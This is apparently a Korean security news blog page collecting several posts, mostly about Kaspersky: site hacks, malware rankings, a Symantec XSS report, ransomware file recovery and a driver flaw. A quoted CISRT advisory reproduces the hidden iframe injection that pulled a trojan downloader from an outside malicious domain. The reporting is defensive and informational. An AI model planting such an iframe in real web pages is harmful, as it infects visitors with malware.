최근 제가 블로그를 통해 다양한 보안 사고에 대해 포스팅을 하고 있습니다. 그 중에서 가장 많이 오르내리는 인물이 바로 Unu입니다. Unu는 루마니아 출신의 해커로 알려져 있습니다만, 그 이외에 별로 알려져 있지 않습니다. 다만, 국내외 보안 기업의 웹사이트의 보안 수준을 검사하여 취약점이 있는 경우 이를 밝혀서 유명세를 얻고 있습니다.

보안뉴스에서는 Unu와 같은 해커를 '그레이 해커'로 분류한 기사를 송고하기도 했습니다. 어떻게 부르느냐에 따라 그 해커의 성품(!)이 결정된다는 점에서 한번쯤 읽어 볼만한 기사입니다.



하여튼, Unu는 보안 기업 중에서 특히 카스퍼스키가 맘에 안드나 봅니다(농담!). 지난 2월달에 카스퍼스키 미국판 웹사이트를 해킹하여 데이터베이스 등 전체적인 데이터를 해킹한 바가 있습니다.

그리고, 지난 12월 10일 경에는 포르투칼 웹사이트를 해킹하여 이를 공개했습니다. 관련 기사는 아래 링크를 참고하십시오.



그런데, 그런데, 그런데~

카스퍼스키 말레이시아와 싱가포르 홈페이지도 SQLi(SQL Injection) 취약점으로 또다시 확실하게 털렸습니다. 이번에는 매우 자세한 스크린샷을 공개했습니다. 다만, 공개한 취약점은 현재 보완이 된 것으로 알려져 있습니다.


이에 대한 자세한 사항은 아래 링크를 참고하십시오.


감사합니다.
이올린에 북마크하기(0) 이올린에 추천하기(0)
Posted by 문스랩닷컴


    요즘 국내에서 공격적인 마케팅을 퍼붓고 있는 카스퍼스키에서 Mac OS에서 사용할 수 있는 안티바이러스 제품을 지난 10월 8일 출시했습니다. 이 제품을 통해 맥 사용자는 보다 보안을 강화할 수 있습니다.

    카스퍼스키 맥용 제품은 Mac OS X 10.4.11 버전 및 그 이상 버전에서 사용할 수 있습니다. 또한, 맥용 제품은 맥 컴퓨터에서 바이러스, 웜, 트로이 목마 등을 보호할 뿐만 아니라, 윈도우 및 리눅스 운영 체제에서 동작하는 악성 프로그램까지 예방할 수 있습니다. 따라서, 맥 등에서 공유 폴더를 만들어서 윈도우 클라이언트가 사용할 때 발생 가능한 웜의 감염을 미리 예방할 수 있습니다.

    자세한 사항은 아래 링크를 참고하십시오.


    감사합니다.
    이올린에 북마크하기(0) 이올린에 추천하기(0)
    Posted by 문스랩닷컴


      어떤 안티바이러스(바이러스 백신)가 바이러스를 잘 잡을까?

      위에 언급한 질문에 대해서는 다양한 의견이 나오고 있으며, 제시된 의견 가운데 서로 싸우는 경우까지 볼 수 있습니다. 이 잘 잡는다 못잡는다 호사가들의 입방아에 자주 오르내릴 수 있는 민간한 사안입니다.

      현재까지 보안 시장에서 널리 알려진 평가 및 인증 기관으로는 Virus Bulletin(http://www.virusbtn.com), CheckMark(http://www.westcoastlabs.com), AV-Comparatives(http://www.av-comparatives.org/) 등이 있습니다.

      이 기관들은 안티바이러스 벤더로부터 유무형의 지원을 받고 있어, 이를 두고서도 약간의 말들이 나오는 상황입니다.

      하지만 최근, 이러한 기관이외에 새로운 평가를 제시하는 사이트가 새롭게 선보였습니다. 이 사이트이 이름은 ANTIVIRUS WARE(http://www.antivirusware.com/)입니다.

      또한, Norton, NOD32, Kaspersky, AntiVir, BitDefender, avast!, Trend Micro, AVG, F-Secure 등의 제품을 성능, 설치 시간, 검사 시간, 업데이트 주기 등으로 비교하여 분석한 자료를 공개했습니다.

      1. 메모리 사용량: 컴퓨터가 유휴 상태일 때에 측정.

      2. 재부팅 시간: 안티바이러스 제품을 설치하지 않은 상태에서 재부팅 시간과 설치후 재부팅 시간을 비교.

      3. 설치 용량: 업데이트를 다운로드하기 전, 안티바이러스 설치 용량.

      4. 프로그램 로딩 시간: 안티바이러스 제품을 설치하지 않은 상태에서 파이어폭스 브라우저를 50번 실행한 시간과 설치후 실행한 시간을 비교.

      5. 파일 변환 시간: MP3 파일을 다른 형태로 변환하는데 걸리는 시간을 비교.(MP3 -> WAV -> MP3 -> WMA -> MP3)

      전체 성능 비교.

      감사합니다.
      이올린에 북마크하기(0) 이올린에 추천하기(0)
      Posted by 문스랩닷컴


        카스퍼스키 안티바이러스 제품을 개발하는 카스퍼스키랩에서는 2009년도 4월달 월간 악성 프로그램 경향에 대한 간략한 보고서를 발표했습니다.

        카스퍼스키 안티바이러스 2009 제품 군에서 수집한 데이터 중에 가장 많이 발견된 악성 프로그램은 다음과 같습니다.

        순위 이름
        1 Net-Worm.Win32.Kido.ih
        2 Virus.Win32.Sality.aa
        3 Trojan-Dropper.Win32.Flystud.ko
        4 Trojan.Win32.Chifrax.a
        5 Trojan.Win32.Autoit.ci

        6 Trojan-Downloader.Win32.VB.eql
        7 Packed.Win32.Krap.b
        8 Worm.Win32.AutoRun.dui
        9 New Exploit.HTML.CodeBaseExec
        10 Packed.Win32.Black.a
        11 Virus.Win32.Sality.z
        12 Virus.Win32.Virut.ce
        13 Trojan.JS.Agent.xy
        14 Worm.Win32.Mabezat.b
        15 Virus.Win32.Alman.b
        16 Packed.Win32.Krap.g
        17 Packed.Win32.Klone.bj
        18 Worm.Win32.AutoIt.ar
        19 Exploit.JS.Agent.agc
        20 Email-Worm.Win32.Brontok.q

        이 달에 새롭게 추가된 악성 프로그램은 Virus.Win32.Virut.ce와 Exploit.HTML.CodeBaseExec입니다.

        Virut.ce는 Virut 악성 프로그램의 최신 변형판으로 이미 악명을 널리 퍼진 악성 프로그램 중 하나입니다.
        Exploit.HTML.CodeBaseExec도 이미 2004년도에 출현한 오래된 악성 프로그램이지만 매해 새로운 변형 판이 나오면서 위력을 여전히 발휘하고 있습니다. 이 악성 프로그램은 IE 6 이하의 버전에 발견되는 취약점을 이용하고 있습니다. 대부분 오래된 버전의 프로그램을 그대로 사용하거나 최신 보안 업데이트를 하지 않는 경우에 감염됩니다만 여전히 많은 사람들이 이러한 문제에 대해 제대로 인식하지 못하는 것으로 보입니다.

        한편 언급한 20가지의 악성 프로그램을 유형별로 구분하면 다음과 같습니다.

        트로이목마 – 25%
        바이러스 – 45%
        악성 코드 – 30%

        참고로 4월달에는 모두 45,190개의 새로운 악성, 광고 및 기타 유해한 프로그램이 감지되었습니다.

        이제 가장 많이 감염시킨 악성 프로그램 순위 20을 알아보겠습니다.

        순위 이름
        1 Virus.Win32.Sality.aa
        2 Worm.Win32.Mabezat.b
        3 Virus.Win32.Virut.ce
        4 Net-Worm.Win32.Nimda
        5 Virus.Win32.Xorer.du
        6 Virus.Win32.Sality.z
        7 Virus.Win32.Parite.b
        8 Virus.Win32.Virut.q
        9 Virus.Win32.Alman.b
        10 Virus.Win32.Small.l
        11 Email-Worm.Win32.Runouce.b
        12 Net-Worm.Win32.Kido.ih
        13 Trojan-Downloader.HTML.Agent.ml
        14 Virus.Win32.Virut.n
        15 Virus.Win32.Parite.a
        16 Virus.Win32.Hidrag.a
        17 Worm.Win32.Fujack.k
        18 P2P-Worm.Win32.Bacteraloh.h
        19 Trojan-Clicker.HTML.IFrame.acy
        20 New Virus.Win32.Virut.av

        순위를 주의깊게 살펴 보면 Virut이라는 단어가 여러개 보입니다. Virut 악성 프로그램은 2007년도에 출현한 아주 오래된 악성 프로그램이지만 여전히 다양한 변형 판을 제작해서 사용자들을 힘들게 하고 있습니다.

        다시 한번 보안 패치의 중요성을 강조합니다!
        이올린에 북마크하기(0) 이올린에 추천하기(0)
        Posted by 문스랩닷컴


          일반 웹사이트들도 보안에 취약하여 여러가지 뉴스거리가 되곤 합니다. 하지만, 시만텍과 같은 세계적인 보안 기업에서도 조차 웹사이트를 제대로 관리하지 못해 이슈화된 소식을 전해 드립니다.

          시만텍 홈페이지를 방문한 사용자에게 원격으로 악성 코드를 실행시킬 수 있는 XSS 공격 취약점을 가지고 있는 것으로 나타났습니다.

          XSS(cross-site scripting)는 공격자가 웹 쿠키를 훔칠 수 있는 것으로 시만텍 사이트를 방문한 사용자의 컴퓨터에 쿠키가 저장됩니다. 이러한 쿠키를 통해 웹사이트에서는 이미 올바른 비밀번호를 사용했는지 등에 대한 정보를 다루는데 사용됩니다.

          또다른 취약점으로는 Imageshack.us와 같이 다른 웹 사이트의 이미지를 삽입할 수 있는 것으로 알려졌습니다. 이 기법은 t3am3lite라고 불리워지는 해킹 보물상자(hacking collective)에 이미 문서화되어 있으며 전문적인 기술을 가진 해커가 아닌 일반적 지식을 가진 해커들돌 손쉽게 이러한 스크립트나 다른 종류의 코드를 삽입할 수 있습니다.

          마지막으로 SQL 인젝션과 CSRF, cross-site request forgeries, XSS  공격 등을 통해 사용자가 안전하다고 신뢰하는 사이트에 방문하는 과정에서 악성 코드에 감염되거나 피싱 공격을 당할 수 있습니다.

          이러한 문제점은 시만텍뿐만이 아니며 그 전에는 카스퍼스키, 비트디펜더와 같은 보안 기업도 마찬가지의 취약점을 노출하여 창피를 당하기도 했습니다.
          Screenshot of Symantec XSS bug in action

          XSS 공격을 통해 가져온 쿠키 정보

          시만텍은 이러한 취약점에 대해 공식적으로 확인하고 문제 해결을 위해 노력 중입니다. 하지만, 현재까지 이러한 취약점은 해결되지 않은 상태로 노출되어 있습니다. 보다 자세한 화면은 아래 링크를 참고하십시오.

          참고자료: http://nemesis.te-home.net/News/20090415_Symantec_Website_Open_to_XSS_Vulnerability.html

          출처 http://www.theregister.co.uk/2009/04/15/symantec_xss_bugs/

          이올린에 북마크하기(0) 이올린에 추천하기(0)
          Posted by 문스랩닷컴


            최근 컴퓨터의 파일을 암호화하여 금품을 요구하는 바이러스인 블랙 메일러에 대해 소개해 드린 적이 있습니다.

            참고자료: http://moonslab.com/644

            안티바이러스 벤더인 카스퍼스키 랩은 이 바이러스를 Gpcode.ak라고 명명하고 있으며, 감염시 파일을 암호화하여 피해를 입는 경우 이를 해결하기 위한 방안의 일환으로 암호 방식을 깨기 위해 노력하고 있습니다.

            이러한 노력 이외에 감염되는 행동 방식을 분석한 결과 다음과 같이 암호화하기 이전의 파일을 복구할 수 있는 방안을 소개하고 있습니다.

            Gpcode.ak 바이러스는 원본 파일을 강력한 1024비트로 암호화하고 나서 원래의 파일을 삭제합니다. 하지만, 새로운 암호화 파일을 생성할 때에 원래의 파일의 사본을 이용하여 만들기 때문에 원본을 복구할 수 있는 가능성이 높습니다.

            컴퓨터를 잘 아는 분들은 파일을 삭제하더라도 실제 파일의 내용을 삭제하는 것이 아니라 FAT과 같은 파일의 저장 위치를 기록하는 데이터베이스에서만 삭제된다는 사실을 잘 아실 것입니다.

            삭제한 파일을 복구하는 프로그램은 다양하지만, 카스퍼스키 랩에서 추천하는 프로그램은 PhotoRec 입니다. 이 프로그램은 무료로 제공되는 프로그램으로, 사용자가 원하는 경우 개발자에게 일정한 금액을 보상할 수 있는 방식입니다.

            또한, ERD CommanderFinal Data Enterprise와 같은 전문적인 파일 복구 프로그램을 이용하는 것도 고려할 만 합니다.

            하지만, 컴퓨터를 재부팅하거나 너무나 많은 파일이 암호화하여 변조되거나, 변조된 시점이 너무 오래된 경우는 복구하더라도 정상적으로 복구되지 않을 가능성이 있다는 점을 주목해야 합니다.

            카스퍼스키 자료: http://kasperskylab.co.kr/board/bbs/board.php?bo_table=News&wr_id=192&page=&nca=

            이올린에 북마크하기(0) 이올린에 추천하기(0)
            Posted by 문스랩닷컴


              요즘 안티바이러스 업계의 굴욕(!)이 계속되고 있습니다. 어제 그제에는 무료백신으로 유명한 어베스트!에서 엑셀 파일에 관련된 오진(오탐)이 나오기도 했습니다. 아래 자료를 참고하세요.

              http://avast.co.kr/409

              다만 엑셀 파일에 대한 것이어서 일반적인 피해는 적은 편입니다만, 이번에는 카스퍼스키 제품에서 윈도우의 핵심 파일을 오진하는 사태가 발생한 적이 있습니다. 이에 대한 소식을 전해 드립니다.

              지난 12월 19일, 카스퍼스키 안티 바이러스 제품의 제작사인 카스퍼스키 랩에서는 잘못된 시그내처 업데이트로 인해 윈도우 탐색기(explorer.exe) 파일을 Huhk-C 바이러스에 감염되었다는 오진을 하게 했습니다.
              사용자 삽입 이미지
              이로 인해 탐색기 파일을 격리 보관하거나 삭제하는 경우에는 윈도우가 정상적으로 실행되지 않는 사태가 발생하였습니다.

              이러한 사실은 카스퍼스키 포럼에서 Carl이라는 사용자가 올린 글을 통해 알려졌으며 수많은 사람들이 이에 대한 댓글을 통해 오진인지 여부에 대한 이야깃거리가 난무했습니다. 오진으로 인해 'explorer 파일을 삭제하는 경우'에 가장 최악의 사태가 발생하는데 이 사용자는 회사에서 네트워크 검사를 통해 삭제하는 바람에 근무 외시간까지 일을 해서 새벽 5시경에 정리할 수 있었다고 합니다.

              한편 카스퍼스키 영국(UK) 관계자에 따르면 영국 고객 중에서 이러한 오탐으로 인해 문제가 발생한 경우는 한 회사와 3명의 사용자뿐이었다고 합니다. 또한, 이러한 사태가 앞으로 발생하지 않도록 하기 위해 내부적으로 테스트 시스템을 더욱 향상시킬 것이라고 합니다.
              이올린에 북마크하기(0) 이올린에 추천하기(0)
              Posted by 문스랩닷컴


                아마 컴퓨터를 어느정도 쓸 줄 아는 고수나 바이러스 백신 등에 관심을 가지는 사용자들은 대부분 러시아 産의 카스퍼스키 안티 바이러스를 세 손가락 안에 꼽을 것이다.

                바이러스 불러틴과 같은 외국의 바이러스 평가 기관에서 거의 대부분의 결과 카스퍼스키가 1등을 먹는 경우가 많다. 그만큼 방대한 바이러스 데이터베이스, 빠른 업데이트 등을 주무기로 러시아부터 시작하여 우리나라에서 어느 정도 시장에 진입한 상태이다.

                하지만, 요즘 추세인 토탈 보안 솔루션(일명 안티 바이러스 + 안티 스파이 웨어 + 개인용 방화벽)에서 볼때 카스퍼스키 제품은 아직까지 완벽한 모습을 보여주지 못하고 있다. 최근 출시된 카스퍼스키 인터넷 시큐리티 7.0 버전은 다국어 지원에서 일부 문제점을 보이기도 하며, 최근에 본 글에 따르면 일부 컴퓨터와 궁합이 잘 맞지 않는 현상도 본 적이 있다.

                참! 카스퍼스키 안티 바이러스를 평가절하는 글이 아니다. 이제 본론으로 들어가 보자.

                사용자 삽입 이미지
                 우리가 가장 많이 사용하는 개인용 방화벽 제품 중에 무료로 제공되는 또는 유료로 제공되는 제품 중에서 존알람(Zone Alarm)이 있다. 하위 버전은 무료이지만 최신 버전은 유료로 판매되고 있다.

                존 알람에서는 안티 바이러스 기능이 빠져있었는데 존알람 시큐리티 슈트 제품에 들어서면서 토탈 보안 솔루션으로 변신해가고 있다. 하지만, 처음의 통합이어서 그런지 매끄러운 부분이 부족하고, 최적의 성능을 보여주기에는 역부족이었다.

                하지만, 최근 출시한 존알람 시큐리티 슈트 7.0 버전은 이러한 우려는 어느정도 잠재울 수 있는 강력한 토탈 보안 기능을 제공한다. 앞서 왜 카스퍼스키를 언급했을까?

                바로 존알람 제품에 카스퍼스키 안티바이러스 엔진이 모듈로 제공되고 있다. 따라서 최고의 방화벽 프로그램과 최고의 안티 바이러스 프로그램이 결합되어 있어 사용자가 만족할만한 보안 성능을 보장받을 수 있다.
                사용자 삽입 이미지
                기본적으로 제공되는 기능은 다음과 같다.
                • 방화벽 기능
                • 프로그램 제어
                • 안티 바이러스/안티 스파이웨어
                • 이메일 보호
                • 개인 정보 보호
                • 신용 정보 도난 보호
                • 메신저 보안
                • 컴퓨터 사용 제한

                아마 이정도면 다른 인터넷 시큐리티 제품과 비교하여도 손색이 없다. 다음 번에는 설치 부터 자세한 세팅에 대해 다룰 예정이니 기대하길 바란다.

                이올린에 북마크하기(0) 이올린에 추천하기(0)
                Posted by 문스랩닷컴


                  각 나라별로는 정보 보안을 담당하는 기관들이 있으며, 이러한 기관 내에는 침해사고 대응팀, 보안 대응팀 등이 운영되고 있다.

                  우리나라에서는 다음과 같은 기관이 있다.

                  이 번에 수모를 당한 기관은 중국에서 운영하고 있는 CISRT(Chinese Internet Security Response Team)으로 영문 웹사이트가 해킹을 당한 것으로 알려졌다.

                  CISRT 영문 웹사이트에는 다음과 같이 사과문이 게재되어 있다.

                  ARP attack to CISRT.org

                  We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.  

                  The malicious codes are inserted into the top of some pages.
                  <iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>


                  This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.

                  This trojan-downloader can download 20 trojans from ganbibi.com.

                  We suggest everyone could block this two domains "nmmmn.com","ganbibi.com"

                  사연은 이렇다. CISRT 웹사이트 중 영문 웹사이트의 일부 탑페이지에서 iframe 악성코드가 삽입되는 공격을 당했다. 이 웹사이트를 방문한 사람은 37Kb 크기의 "sms.exe"라는 실행 파일을 다운로드하게 한다. 이 파일은 카스퍼스키 안티바이러스에서는 "Troyan-Downloader.Win32.Baser.w"로 진단한다.

                  중국에서 개발한 웹 브라우저 기반의 미디어 플레이어인 BaoFeng Storm의 버퍼오버플로 취약점으로 통해 공격이 이루어졌다. BaoFeng Storm은 ActiveX 컨트롤을 이용하여 제공되며, 이전에 이미 시만텍은 사용자가 입력한 값을 확인하는 부분이 제대로 동작하지 않아 여러 개의 버퍼오버플로 취약점이 존재한다고 밝혔다.

                  CISRT는 웹 사이트가 해킹된 것이 아니라 "ARP" 공격의 이루어진 것으로 믿고 있다. "ARP" 공격은 최신 공격 기법 중의 하나로 ARP poisoning 또는 ARP spoofing 공격이라고도 한다.

                  보안 벤더인 F-Secure의 패트릭 러날드(Patrik Runald)는 CISRT 웹사이트가 해킹 당한 것으로 보이며, ARP 공격이라고 한다면 꽤 복잡한 방법을 사용했을 것이라고 밝혔다.

                  출처: http://www.zdnetasia.com/news/security/0,39044215,62032982,00.htm

                  특히 국가에서 운영하는 보안 기관의 웹사이트는 일반인들이 아무런 의심없이 접속하는 사이트로 보안 상태가 가장 철저하게 유지되어야 하는데, 이러한 사고가 났다니 참 어이없는 일이 아닐 수 없다.

                  우리나라 특히, 교육기관같은 정부기관은 외국의 해킹 앞마당 노릇을 하고 있는 형편이다. 이러한 점들을 보완해야 IT 강국으로서의 면모가 서지 않을까?

                  Daum 블로거뉴스
                  블로거뉴스에서 이 포스트를 추천해주세요.

                  이올린에 북마크하기(0) 이올린에 추천하기(0)
                  Posted by 문스랩닷컴


                    전세계적으로 호평받고 있는 카스퍼스키 안티바이러스 제품에 보안 취약점이 발견되어 주의가 요망된다.

                    이 취약점은 카스퍼스키 안티바이러스 6.x와 7.x 그리고 인터넷 시큐리티 6.x와 7.x 등 가장 핵심적인 제품에서 발생한다. 7.0.125 버전에서 맨 처음 발견되었으며 다른 버전에서도 동일하게 나타날 것이다.

                    이 취약점을 통해 공격자는 로컬 컴퓨터에서 서비스 거부(Denial of Service) 공격을 수행할 수 있다.

                    원인은 특정한 후킹 함수의 매개변수를 처리할 때 KLIF.SYS g함수내에서 오류가 발생하기 때문으로 "NtCreateSection(), NtUserSendInput(), LoadLibraryA() 함수를 호출할 때와 특별하게 조작된 매개변수를 가진 SSDT 엔트리에서 발생한다고 한다.

                    해결방법은 아직 없으며, 11월달의 업데이트를 통해 처리될 것으로 알려 졌다.

                    관련 정보
                    카스퍼스키: http://www.kaspersky.com/technews?id=203038706
                    루트킷닷컴: http://www.rootkit.com/newsread.php?newsid=778
                    이올린에 북마크하기(0) 이올린에 추천하기(0)
                    Posted by 문스랩닷컴